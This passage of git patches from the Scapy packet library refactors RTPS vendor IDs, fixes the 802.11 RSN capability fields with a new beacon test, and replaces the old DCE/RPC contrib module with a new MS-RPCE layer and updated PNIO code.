None) + self.endianness_from = kwargs.pop("endianness_from", e_flags) + self.fuzz_fun = kwargs.pop("fuzz_fun", fuzz) + super(EPacketField, self).__init__(*args, **kwargs) def set_endianness(self, pkt): if getattr(pkt, "endianness", None) is not None: @@ -167,7 +160,7 @@ def m2i(self, pkt, m): def randval(self): if self.fuzz_fun is not None: return self.fuzz_fun(self.cls()) - return super().randval() + return super(EPacketField, self).randval() class SerializedDataField(StrLenField): @@ -295,24 +288,24 @@ def extract_padding(self, p): _rtps_vendor_ids = { - b"\x00\x00": "VENDOR_ID_UNKNOWN (0x0000)", - b"\x01\x01": "Real-Time Innovations, Inc. - Connext DDS", - b"\x01\x02": "PrismTech Inc. - OpenSplice DDS", - b"\x01\x03": "Object Computing Incorporated, Inc. (OCI) - OpenDDS", - b"\x01\x04": "MilSoft", - b"\x01\x05": "Gallium Visual Systems Inc. - InterCOM DDS", - b"\x01\x06": "TwinOaks Computing, Inc. - CoreDX DDS", - b"\x01\x07": "Lakota Technical Solutions, Inc.", - b"\x01\x08": "ICOUP Consulting", - b"\x01\x09": "ETRI Electronics and Telecommunication Research Institute", - b"\x01\x0A": "Real-Time Innovations, Inc. (RTI) - Connext DDS Micro", - b"\x01\x0B": "PrismTech - OpenSplice Mobile", - b"\x01\x0C": "PrismTech - OpenSplice Gateway", - b"\x01\x0D": "PrismTech - OpenSplice Lite", - b"\x01\x0E": "Technicolor Inc. - Qeo", - b"\x01\x0F": "eProsima - Fast-RTPS", - b"\x01\x10": "ADLINK - Cyclone DDS", - b"\x01\x11": "GurumNetworks - GurumDDS", + 0x0000: "VENDOR_ID_UNKNOWN (0x0000)", + 0x0101: "Real-Time Innovations, Inc. - Connext DDS", + 0x0102: "PrismTech Inc. - OpenSplice DDS", + 0x0103: "Object Computing Incorporated, Inc. (OCI) - OpenDDS", + 0x0104: "MilSoft", + 0x0105: "Gallium Visual Systems Inc. - InterCOM DDS", + 0x0106: "TwinOaks Computing, Inc. - CoreDX DDS", + 0x0107: "Lakota Technical Solutions, Inc.", + 0x0108: "ICOUP Consulting", + 0x0109: "ETRI Electronics and Telecommunication Research Institute", + 0x010A: "Real-Time Innovations, Inc. (RTI) - Connext DDS Micro", + 0x010B: "PrismTech - OpenSplice Mobile", + 0x010C: "PrismTech - OpenSplice Gateway", + 0x010D: "PrismTech - OpenSplice Lite", + 0x010E: "Technicolor Inc. - Qeo", + 0x010F: "eProsima - Fast-RTPS", + 0x0110: "ADLINK - Cyclone DDS", + 0x0111: "GurumNetworks - GurumDDS", } @@ -323,9 +316,8 @@ class VendorIdPacket(Packet): # ByteField("minor", 0), EnumField( name="vendor_id", - default=b"\x00\x00", + default=0, enum=_rtps_vendor_ids, - fmt="2s" ), ] diff --git a/scapy/contrib/rtps/pid_types.py b/scapy/contrib/rtps/pid_types.py index a5444678acb..dd67a97694f 100644 --- a/scapy/contrib/rtps/pid_types.py +++ b/scapy/contrib/rtps/pid_types.py @@ -23,9 +23,7 @@ import random import struct -from typing import List, Optional -from scapy.base_classes import Packet_metaclass from scapy.fields import ( IntField, PacketField, @@ -718,9 +716,7 @@ class PID_VENDOR_BUILTIN_ENDPOINT_SET(PIDPacketBase): } -def get_pid_class( - pkt: Packet, lst: List[Packet], cur: Optional[Packet], remain: str -) -> Optional[Packet_metaclass]: +def get_pid_class(pkt, lst, cur, remain): if hasattr(pkt, "endianness"): endianness = pkt.endianness diff --git a/scapy/contrib/rtps/rtps.py b/scapy/contrib/rtps/rtps.py index 229fb52df19..aeee40bd8a8 100644 --- a/scapy/contrib/rtps/rtps.py +++ b/scapy/contrib/rtps/rtps.py @@ -22,9 +22,7 @@ # scapy.contrib.status = library import struct -from typing import List, Optional -from scapy.base_classes import Packet_metaclass from scapy.fields import ( ConditionalField, IntField, @@ -204,15 +202,10 @@ class DataPacket(EPacket): ), ] - def __init__( - self, - *args, - writer_entity_id_key=None, - writer_entity_id_kind=None, - endianness=None, - pl_len=0, - **kwargs - ): + def __init__(self, *args, **kwargs): + writer_entity_id_key = kwargs.pop("writer_entity_id_key", None) + writer_entity_id_kind = kwargs.pop("writer_entity_id_kind", None) + pl_len = kwargs.pop("pl_len", 0) if writer_entity_id_key == 0x200 and writer_entity_id_kind == 0xC2: DataPacket._pl_type = "ParticipantMessageData" else: @@ -220,7 +213,7 @@ def __init__( DataPacket._pl_len = pl_len - super().__init__(*args, endianness=endianness, **kwargs) + super(DataPacket, self).__init__(*args, **kwargs) class RTPSSubMessage_DATA(EPacket): @@ -500,10 +493,7 @@ class RTPSSubMessage_GAP(EPacket): } -def _next_cls_cb( - pkt: Packet, lst: List[Packet], p: Optional[Packet], remain: str -) -> Optional[Packet_metaclass]: - +def _next_cls_cb(pkt, lst, p, remain): sm_id = struct.unpack("!b", remain[0:1])[0] next_cls = _RTPSSubMessageTypes.get(sm_id, None) diff --git a/test/contrib/rtps/rtps.uts b/test/contrib/rtps.uts similarity index 98% rename from test/contrib/rtps/rtps.uts rename to test/contrib/rtps.uts index b6b173d630b..9b49b2bccd4 100644 --- a/test/contrib/rtps/rtps.uts +++ b/test/contrib/rtps.uts @@ -60,7 +60,7 @@ assert(bytes(RTPS()) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x = RTPS packet declaration pkt3 = RTPS( protocolVersion=ProtocolVersionPacket(major=2, minor=1), - vendorId=VendorIdPacket(vendor_id=b"\x01\x10"), + vendorId=VendorIdPacket(vendor_id=0x0110), guidPrefix=GUIDPrefixPacket( hostId=1466109953, appId=3601547391, instanceId=1540995868 ), @@ -108,7 +108,7 @@ pkt3 = RTPS( PID_VENDOR_ID( parameterId=22, parameterLength=4, - vendorId=VendorIdPacket(vendor_id=b"\x01\x10"), + vendorId=VendorIdPacket(vendor_id=0x0110), padding=b"\x00\x00", ), PID_PARTICIPANT_LEASE_DURATION( @@ -239,7 +239,7 @@ d = b"\x52\x54\x50\x53\x02\x03\x01\x01\x01\x01\x30\xba\xa8\x7b\x1d\xce" \ p0 = RTPS(d) p1 = RTPS( protocolVersion=ProtocolVersionPacket(major=2, minor=3), - vendorId=VendorIdPacket(vendor_id=b"\x01\x01"), + vendorId=VendorIdPacket(vendor_id=0x0101), guidPrefix=GUIDPrefixPacket( hostId=16855226, appId=2826640846, instanceId=3005816387 ), @@ -299,7 +299,7 @@ p1 = RTPS( PID_VENDOR_ID( parameterId=22, parameterLength=4, - vendorId=VendorIdPacket(vendor_id=b"\x01\x01"), + vendorId=VendorIdPacket(vendor_id=0x0101), padding=b"\x00\x00", ), PID_PRODUCT_VERSION( @@ -404,4 +404,4 @@ p1 = RTPS( ) assert p0.build() == d assert p1.build() == d -assert p1 == p0 \ No newline at end of file +assert p1 == p0 From 739aeb26cbc67b293c014963acafc4658f6e2a6b Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 1 Jul 2022 09:47:47 +0200 Subject: [PATCH 0837/1632] Improve command help extraction from docstring (#3672) --- scapy/config.py | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index 544cbffb4da..a33123fc152 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -326,8 +326,9 @@ def __repr__(self): # type: () -> str s = [] for li in sorted(self, key=lambda x: x.__name__): - doc = li.__doc__.split("\n")[0] if li.__doc__ else "--" - s.append("%-20s: %s" % (li.__name__, doc)) + doc = li.__doc__ if li.__doc__ else "--" + doc = doc.lstrip().split('\n', 1)[0] + s.append("%-22s: %s" % (li.__name__, doc)) return "\n".join(s) def register(self, cmd): From 619f3df19256e0b88c9a2f843de3846b401d74df Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 2 Jul 2022 09:48:40 +0200 Subject: [PATCH 0838/1632] Fix length calculation in Dot11EltRSN (#3662) --- scapy/layers/dot11.py | 30 +++++++++++++++++++++++++++--- test/scapy/layers/dot11.uts | 10 ++++++++++ 2 files changed, 37 insertions(+), 3 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 0a04e49253c..068163557a4 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -601,7 +601,7 @@ def post_build(self, p, pay): 9: "ATIM", 10: "Disassociation", 11: "Authentication", - 12: "Deauthentification", + 12: "Deauthentication", 13: "Action", 14: "Action No Ack", }, @@ -1008,6 +1008,8 @@ def network_stats(self): ) +# 802.11-2020 9.4.2.1 + class Dot11Elt(Packet): """ A Generic 802.11 Element @@ -1071,6 +1073,8 @@ def post_build(self, p, pay): return p + pay +# 802.11-2020 9.4.2.4 + class Dot11EltDSSSet(Dot11Elt): name = "802.11 DSSS Parameter Set" match_subclass = True @@ -1081,6 +1085,8 @@ class Dot11EltDSSSet(Dot11Elt): ] +# 802.11-2020 9.4.2.11 + class Dot11EltERP(Dot11Elt): name = "802.11 ERP" match_subclass = True @@ -1094,6 +1100,8 @@ class Dot11EltERP(Dot11Elt): ] +# 802.11-2020 9.4.2.24.2 + class RSNCipherSuite(Packet): name = "Cipher suite" fields_desc = [ @@ -1120,6 +1128,8 @@ def extract_padding(self, s): return "", s +# 802.11-2020 9.4.2.24.3 + class AKMSuite(Packet): name = "AKM suite" fields_desc = [ @@ -1151,6 +1161,8 @@ def extract_padding(self, s): return "", s +# 802.11-2020 9.4.2.24.5 + class PMKIDListPacket(Packet): name = "PMKIDs" fields_desc = [ @@ -1167,6 +1179,8 @@ def extract_padding(self, s): return "", s +# 802.11-2020 9.4.2.24.1 + class Dot11EltRSN(Dot11Elt): name = "802.11 RSN information" match_subclass = True @@ -1197,13 +1211,22 @@ class Dot11EltRSN(Dot11Elt): AKMSuite, count_from=lambda p: p.nb_akm_suites ), + # RSN Capabilities + # 802.11-2020 9.4.2.24.4 BitField("mfp_capable", 1, 1), BitField("mfp_required", 1, 1), BitField("gtksa_replay_counter", 0, 2), BitField("ptksa_replay_counter", 0, 2), BitField("no_pairwise", 0, 1), BitField("pre_auth", 0, 1), - BitField("reserved", 0, 8), + BitField("reserved", 0, 1), + BitField("ocvc", 0, 1), + BitField("extended_key_id", 0, 1), + BitField("pbac", 0, 1), + BitField("spp_a_msdu_required", 0, 1), + BitField("spp_a_msdu_capable", 0, 1), + BitField("peer_key_enabled", 0, 1), + BitField("joint_multiband_rsna", 0, 1), # Theoretically we could use mfp_capable/mfp_required to know if those # fields are present, but some implementations poorly implement it. # In practice, do as wireshark: guess using offset. @@ -1227,8 +1250,9 @@ class Dot11EltRSN(Dot11Elt): 12 + (pkt.nb_pairwise_cipher_suites or 0) * 4 + (pkt.nb_akm_suites or 0) * 4 + + (2 if pkt.pmkids else 0) + (pkt.pmkids and pkt.pmkids.nb_pmkids or 0) * 16 - ) >= 2 + ) >= 4 ) ) ] diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 55d2466e96e..41469d28903 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -258,6 +258,16 @@ assert f[Dot11EltRSN].group_cipher_suite[0].cipher == 0x04 assert f[Dot11EltRSN].pairwise_cipher_suites[0].cipher == 0x04 assert f[Dot11EltRSN].akm_suites[0].suite == 0x01 += Other Beacon with RSN IE +f = Dot11(b'\x00\x00<\x00h}\xb4_\x1a\x0eJe}\xf2@\xb2h}\xb4_\x1a\x0e\xb0\xe8\x11\x11\x14\x00\x00\x08wpa3-sae\x01\x07\x12\x98$\xb0H`l!\x02\xf9\x15$\n$\x044\x04d\x0b\x95\x04\xa5\x010&\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\t\xcc\x00\x01\x00\xed!\xd6\xf6\xc2\x12C\xce\xbd\x94\xb6\xc3\xb1\xea%^F\x051\x08\x01\x00\x006\x03\xac4\x00-\x1ao\x00\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x08\x00\x00\x08\x00\x00\x00\x00@\xbf\x0c2p\x81\x0f\xfa\xff\x00\x00\xfa\xff\x00\x00\xc7\x01\x11\xff\x1c#\x01\x08\x08\x00\x00\x80D0\x02\x00\x1d\x00\x9f\x08\x00\x0c\x00\xfa\xff\xfa\xff9\x1c\xc7q\x1c\x07\xdd\x0b\x00\x17\xf2\n\x00\x01\x04\x00\x00\x00\x00\xdd\x05\x00\x90L\x04\x07\xdd\n\x00\x10\x18\x02\x00\x00\x10\x00\x00\x02\xdd\x07\x00P\xf2\x02\x00\x01\x00\x90\xe7\xf5\x12') +assert Dot11EltRSN in f +assert f.group_management_cipher_suite is None +assert len(list(f.iterpayloads())) == 19 +assert Dot11EltHTCapabilities in f +assert f.mfp_capable and f.mfp_required +assert f.pmkids.nb_pmkids == 1 +assert f.pmkids.pmkid_list == [b'\xed!\xd6\xf6\xc2\x12C\xce\xbd\x94\xb6\xc3\xb1\xea%^'] + = Beacon with Microsoft WPA IE f = Dot11(b"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xffNN5V\xee\x03NN5V\xee\x030\x8f\x80\x01\xdc7\x00\x00\x00\x00\x90\x011\x04\x00\x0bciscosb-wpa\x01\x08\x82\x84\x8b\x96\x0c\x12\x18$\x03\x01\x06\x05\x04\x00\x01\x00\x00*\x01\x00\xdd\x16\x00P\xf2\x01\x01\x00\x00P\xf2\x04\x01\x00\x00P\xf2\x04\x01\x00\x00P\xf2\x012\x040H`l\xdd\x18\x00P\xf2\x02\x01\x01\x85\x00\x03\xa4\x00\x00'\xa4\x00\x00BC^\x00b2/\x00\xdd\x1e\x00\x90L3L\x10\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-\x1aL\x10\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x1a\x00\x90L4\x06\x08\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x16\x06\x08\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\x0e\x14\x00\n\x00,\x01\xc8\x00\x14\x00\x05\x00\x19\x00\x7f\x01\x01\xdd\t\x00\x03\x7f\x01\x01\x00\x00\xff\x7f\xdd\n\x00\x03\x7f\x04\x01\x00\x06\x00@\x00") assert Dot11EltMicrosoftWPA in f From a738a0b375a5599187626c9a9b081f7c25392f69 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 3 Jul 2022 15:09:59 +0200 Subject: [PATCH 0839/1632] MS-RPCE support (#3674) * Add DCE/RPC * Add tests to DCERPC5 / PNIO_RPC fixes * Support for NDR fields in DCERPC * Fully implement KRB5_GSS * Support also RFC4121 --- scapy/asn1/mib.py | 2 + scapy/asn1fields.py | 12 +- scapy/contrib/dce_rpc.py | 172 ---- scapy/contrib/pnio_rpc.py | 62 +- scapy/contrib/rtps/common_types.py | 40 +- scapy/contrib/rtps/pid_types.py | 6 +- scapy/contrib/rtps/rtps.py | 40 +- scapy/fields.py | 9 +- scapy/layers/dcerpc.py | 883 ++++++++++++++++++ scapy/layers/gssapi.py | 14 +- scapy/layers/kerberos.py | 229 ++++- scapy/layers/smb.py | 30 +- scapy/layers/smb2.py | 5 +- test/contrib/pnio_rpc.uts | 46 +- .../dce_rpc.uts => scapy/layers/dcerpc.uts} | 60 +- 15 files changed, 1314 insertions(+), 296 deletions(-) delete mode 100644 scapy/contrib/dce_rpc.py create mode 100644 scapy/layers/dcerpc.py rename test/{contrib/dce_rpc.uts => scapy/layers/dcerpc.uts} (50%) diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index 0c48142a2af..bdb020b36c2 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -617,6 +617,8 @@ def load_mib(filenames): # gssapi_oids = { + '1.2.840.48018.1.2.2': 'MS KRB5 - Microsoft Kerberos 5', + '1.2.840.113554.1.2.2': 'Kerberos 5', '1.3.6.1.5.5.2': 'SPNEGO - Simple Protected Negotiation', '1.3.6.1.4.1.311.2.2.10': 'NTLMSSP - Microsoft NTLM Security Support Provider', '1.3.6.1.4.1.311.2.2.30': 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism', diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 1fd4d2f9ce8..e2be26752e2 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -8,7 +8,8 @@ Classes that implement ASN.1 data structures. """ -from __future__ import absolute_import +from functools import reduce + from scapy.asn1.asn1 import ( ASN1_BIT_STRING, ASN1_BOOLEAN, @@ -27,6 +28,8 @@ BER_tagging_dec, BER_tagging_enc, ) +from scapy.base_classes import BasePacket +from scapy.compat import raw from scapy.volatile import ( GeneralizedTime, RandChoice, @@ -36,10 +39,8 @@ RandString, RandField, ) -from scapy.compat import raw -from scapy.base_classes import BasePacket + from scapy import packet -from functools import reduce import scapy.libs.six as six from scapy.compat import ( @@ -802,6 +803,9 @@ def m2i(self, pkt, s): cls = self.next_cls_cb(pkt) or self.cls else: cls = self.cls + if not hasattr(cls, "ASN1_root"): + # A normal Packet (!= ASN1) + return self.extract_packet(cls, s, _underlayer=pkt) diff_tag, s = BER_tagging_dec(s, hidden_tag=cls.ASN1_root.ASN1_tag, # noqa: E501 implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag, diff --git a/scapy/contrib/dce_rpc.py b/scapy/contrib/dce_rpc.py deleted file mode 100644 index 486ae83afc4..00000000000 --- a/scapy/contrib/dce_rpc.py +++ /dev/null @@ -1,172 +0,0 @@ -# This file is part of Scapy -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - -# Copyright (C) 2016 Gauthier Sebaux - -# scapy.contrib.description = DCE/RPC -# scapy.contrib.status = loads - -""" -A basic dissector for DCE/RPC. -Isn't reliable for all packets and for building -""" - -import struct - -from scapy.packet import Packet, Raw, bind_layers -from scapy.fields import ( - BitEnumField, - ByteEnumField, - ByteField, - FlagsField, - IntField, - LenField, - ShortField, - UUIDField, - XByteField, - XShortField, -) - - -# Fields -class EndiannessField(object): - """Field which change the endianness of a sub-field""" - __slots__ = ["fld", "endianess_from"] - - def __init__(self, fld, endianess_from): - self.fld = fld - self.endianess_from = endianess_from - - def set_endianess(self, pkt): - """Add the endianness to the format""" - end = self.endianess_from(pkt) - if isinstance(end, str) and end: - if isinstance(self.fld, UUIDField): - self.fld.uuid_fmt = (UUIDField.FORMAT_LE if end == '<' - else UUIDField.FORMAT_BE) - else: - # fld.fmt should always start with a order specifier, cf field - # init - self.fld.fmt = end[0] + self.fld.fmt[1:] - self.fld.struct = struct.Struct(self.fld.fmt) - - def getfield(self, pkt, buf): - """retrieve the field with endianness""" - self.set_endianess(pkt) - return self.fld.getfield(pkt, buf) - - def addfield(self, pkt, buf, val): - """add the field with endianness to the buffer""" - self.set_endianess(pkt) - return self.fld.addfield(pkt, buf, val) - - def __getattr__(self, attr): - return getattr(self.fld, attr) - - -# DCE/RPC Packet -DCE_RPC_TYPE = ["request", "ping", "response", "fault", "working", "no_call", - "reject", "acknowledge", "connectionless_cancel", "frag_ack", - "cancel_ack"] -DCE_RPC_FLAGS1 = ["reserved_0", "last_frag", "frag", "no_frag_ack", "maybe", - "idempotent", "broadcast", "reserved_7"] -DCE_RPC_FLAGS2 = ["reserved_0", "cancel_pending", "reserved_2", "reserved_3", - "reserved_4", "reserved_5", "reserved_6", "reserved_7"] - - -def dce_rpc_endianess(pkt): - """Determine the right endianness sign for a given DCE/RPC packet""" - if pkt.endianness == 0: # big endian - return ">" - elif pkt.endianness == 1: # little endian - return "<" - else: - return "!" - - -class DceRpc(Packet): - """DCE/RPC packet""" - name = "DCE/RPC" - fields_desc = [ - ByteField("version", 4), - ByteEnumField("type", 0, DCE_RPC_TYPE), - FlagsField("flags1", 0, 8, DCE_RPC_FLAGS1), - FlagsField("flags2", 0, 8, DCE_RPC_FLAGS2), - BitEnumField("endianness", 0, 4, ["big", "little"]), - BitEnumField("encoding", 0, 4, ["ASCII", "EBCDIC"]), - ByteEnumField("float", 0, ["IEEE", "VAX", "CRAY", "IBM"]), - ByteField("DataRepr_reserved", 0), - XByteField("serial_high", 0), - EndiannessField(UUIDField("object_uuid", None), - endianess_from=dce_rpc_endianess), - EndiannessField(UUIDField("interface_uuid", None), - endianess_from=dce_rpc_endianess), - EndiannessField(UUIDField("activity", None), - endianess_from=dce_rpc_endianess), - EndiannessField(IntField("boot_time", 0), - endianess_from=dce_rpc_endianess), - EndiannessField(IntField("interface_version", 1), - endianess_from=dce_rpc_endianess), - EndiannessField(IntField("sequence_num", 0), - endianess_from=dce_rpc_endianess), - EndiannessField(ShortField("opnum", 0), - endianess_from=dce_rpc_endianess), - EndiannessField(XShortField("interface_hint", 0xffff), - endianess_from=dce_rpc_endianess), - EndiannessField(XShortField("activity_hint", 0xffff), - endianess_from=dce_rpc_endianess), - EndiannessField(LenField("frag_len", None, fmt="H"), - endianess_from=dce_rpc_endianess), - EndiannessField(ShortField("frag_num", 0), - endianess_from=dce_rpc_endianess), - ByteEnumField("auth", 0, ["none"]), # TODO other auth ? - XByteField("serial_low", 0), - ] - - -# Heuristically way to find the payload class -# -# To add a possible payload to a DCE/RPC packet, one must first create the -# packet class, then instead of binding layers using bind_layers, he must -# call DceRpcPayload.register_possible_payload() with the payload class as -# parameter. -# -# To be able to decide if the payload class is capable of handling the rest of -# the dissection, the classmethod can_handle() should be implemented in the -# payload class. This method is given the rest of the string to dissect as -# first argument, and the DceRpc packet instance as second argument. Based on -# this information, the method must return True if the class is capable of -# handling the dissection, False otherwise -class DceRpcPayload(Packet): - """Dummy class which use the dispatch_hook to find the payload class""" - _payload_class = [] - - @classmethod - def dispatch_hook(cls, _pkt, _underlayer=None, *args, **kargs): - """dispatch_hook to choose among different registered payloads""" - for klass in cls._payload_class: - if hasattr(klass, "can_handle") and \ - klass.can_handle(_pkt, _underlayer): - return klass - print("DCE/RPC payload class not found or undefined (using Raw)") - return Raw - - @classmethod - def register_possible_payload(cls, pay): - """Method to call from possible DCE/RPC endpoint to register it as - possible payload""" - cls._payload_class.append(pay) - - -bind_layers(DceRpc, DceRpcPayload) diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index d76d6c81d77..5d11312ec3e 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -31,7 +31,8 @@ LenField, MACField, PadField, PacketField, PacketListField, \ ShortEnumField, ShortField, StrFixedLenField, StrLenField, \ UUIDField, XByteField, XIntField, XShortEnumField, XShortField -from scapy.contrib.dce_rpc import DceRpc, EndiannessField, DceRpcPayload +from scapy.layers.dcerpc import DceRpc4, DceRpc4Payload +from scapy.contrib.rtps.common_types import EField from scapy.compat import bytes_hex from scapy.volatile import RandUUID @@ -611,6 +612,7 @@ class FParametersBlock(Packet): # IODWriteMultipleRe{q,s} class PadFieldWithLen(PadField): """PadField which handles the i2len function to include padding""" + def i2len(self, pkt, val): """get the length of the field, including the padding length""" fld_len = self.fld.i2len(pkt, val) @@ -1461,7 +1463,7 @@ def _guess_block_class(_pkt, *args, **kargs): def dce_rpc_endianess(pkt): """determine the symbol for the endianness of a the DCE/RPC""" try: - endianness = pkt.underlayer.endianness + endianness = pkt.underlayer.endian except AttributeError: # handle the case where a PNIO class is # built without its DCE-RPC under-layer @@ -1478,18 +1480,18 @@ def dce_rpc_endianess(pkt): class NDRData(Packet): """Base NDRData to centralize some fields. It can't be instantiated""" fields_desc = [ - EndiannessField( + EField( FieldLenField("args_length", None, fmt="I", length_of="blocks"), - endianess_from=dce_rpc_endianess), - EndiannessField( + endianness_from=dce_rpc_endianess), + EField( FieldLenField("max_count", None, fmt="I", length_of="blocks"), - endianess_from=dce_rpc_endianess), - EndiannessField( + endianness_from=dce_rpc_endianess), + EField( IntField("offset", 0), - endianess_from=dce_rpc_endianess), - EndiannessField( + endianness_from=dce_rpc_endianess), + EField( FieldLenField("actual_count", None, fmt="I", length_of="blocks"), - endianess_from=dce_rpc_endianess), + endianness_from=dce_rpc_endianess), PacketListField("blocks", [], _guess_block_class, length_from=lambda p: p.args_length) ] @@ -1501,19 +1503,19 @@ def __new__(cls, name, bases, dct): class PNIOServiceReqPDU(Packet): """PNIO PDU for RPC Request""" fields_desc = [ - EndiannessField( + EField( FieldLenField("args_max", None, fmt="I", length_of="blocks"), - endianess_from=dce_rpc_endianess), + endianness_from=dce_rpc_endianess), NDRData, ] overload_fields = { - DceRpc: { - # random object_uuid in the appropriate range - "object_uuid": RandUUID("dea00000-6c97-11d1-8271-******"), + DceRpc4: { + # random object in the appropriate range + "object": RandUUID("dea00000-6c97-11d1-8271-******"), # interface uuid to send to a device - "interface_uuid": RPC_INTERFACE_UUID["UUID_IO_DeviceInterface"], + "if_id": RPC_INTERFACE_UUID["UUID_IO_DeviceInterface"], # Request DCE/RPC type - "type": 0, + "ptype": 0, }, } @@ -1521,31 +1523,31 @@ class PNIOServiceReqPDU(Packet): def can_handle(cls, pkt, rpc): """heuristic guess_payload_class""" # type = 0 => request - if rpc.getfieldval("type") == 0 and \ - str(rpc.object_uuid).startswith("dea00000-6c97-11d1-8271-"): + if rpc.ptype == 0 and \ + str(rpc.object).startswith("dea00000-6c97-11d1-8271-"): return True return False -DceRpcPayload.register_possible_payload(PNIOServiceReqPDU) +DceRpc4Payload.register_possible_payload(PNIOServiceReqPDU) class PNIOServiceResPDU(Packet): """PNIO PDU for RPC Response""" fields_desc = [ - EndiannessField(IntEnumField("status", 0, ["OK"]), - endianess_from=dce_rpc_endianess), + EField(IntEnumField("status", 0, ["OK"]), + endianness_from=dce_rpc_endianess), NDRData, ] overload_fields = { - DceRpc: { - # random object_uuid in the appropriate range - "object_uuid": RandUUID("dea00000-6c97-11d1-8271-******"), + DceRpc4: { + # random object in the appropriate range + "object": RandUUID("dea00000-6c97-11d1-8271-******"), # interface uuid to send to a host - "interface_uuid": RPC_INTERFACE_UUID[ + "if_id": RPC_INTERFACE_UUID[ "UUID_IO_ControllerInterface"], # Request DCE/RPC type - "type": 2, + "ptype": 2, }, } @@ -1553,10 +1555,10 @@ class PNIOServiceResPDU(Packet): def can_handle(cls, pkt, rpc): """heuristic guess_payload_class""" # type = 2 => response - if rpc.getfieldval("type") == 2 and \ - str(rpc.object_uuid).startswith("dea00000-6c97-11d1-8271-"): + if rpc.ptype == 2 and \ + str(rpc.object).startswith("dea00000-6c97-11d1-8271-"): return True return False -DceRpcPayload.register_possible_payload(PNIOServiceResPDU) +DceRpc4Payload.register_possible_payload(PNIOServiceResPDU) diff --git a/scapy/contrib/rtps/common_types.py b/scapy/contrib/rtps/common_types.py index 0475c5682fa..2b47c05ab11 100644 --- a/scapy/contrib/rtps/common_types.py +++ b/scapy/contrib/rtps/common_types.py @@ -33,13 +33,15 @@ IPField, LEIntField, PacketField, + PacketListField, ReversePadField, StrField, StrLenField, + UUIDField, XIntField, XStrFixedLenField, ) -from scapy.packet import Packet, fuzz +from scapy.packet import Packet FORMAT_LE = "<" FORMAT_BE = ">" @@ -69,7 +71,7 @@ class EField(object): __slots__ = ["fld", "endianness", "endianness_from"] - def __init__(self, fld, endianness=FORMAT_BE, endianness_from=e_flags): + def __init__(self, fld, endianness=None, endianness_from=None): self.fld = fld self.endianness = endianness self.endianness_from = endianness_from @@ -89,13 +91,16 @@ def set_endianness(self, pkt): return if isinstance(self.endianness, str) and self.endianness: - if hasattr(self.fld, "fmt"): + if isinstance(self.fld, UUIDField): + self.fld.uuid_fmt = (UUIDField.FORMAT_LE if + self.endianness == '<' + else UUIDField.FORMAT_BE) + elif hasattr(self.fld, "fmt"): if len(self.fld.fmt) == 1: # if it's only "I" _end = self.fld.fmt[0] else: # if it's " bytes + return bytes_encode(i) + def addfield(self, pkt, s, val): # type: (Packet, bytes, Any) -> bytes - return s + b"".join(bytes_encode(v) for v in val) + return s + b"".join(self.i2m(pkt, v) for v in val) class StrFixedLenField(StrField): diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py new file mode 100644 index 00000000000..d666f4acc03 --- /dev/null +++ b/scapy/layers/dcerpc.py @@ -0,0 +1,883 @@ +# This file is part of Scapy +# Scapy is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 2 of the License, or +# any later version. +# +# Scapy is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Scapy. If not, see . + +# Copyright (C) 2016 Gauthier Sebaux +# 2022 Gabriel Potter + +# scapy.contrib.description = DCE/RPC +# scapy.contrib.status = loads + +""" +DCE/RPC +Distributed Computing Environment / Remote Procedure Calls + +Based on [C706] - DCE/RPC 1.1 +https://pubs.opengroup.org/onlinepubs/9629399/toc.pdf +""" + +from collections import namedtuple +# from socket import socket +import struct +from uuid import UUID + +# from scapy.automaton import ATMT, Automaton +from scapy.config import conf +from scapy.layers.gssapi import GSSAPI_BLOB +from scapy.packet import Packet, Raw, bind_bottom_up, bind_layers +from scapy.fields import ( + _FieldContainer, + BitEnumField, + ByteEnumField, + 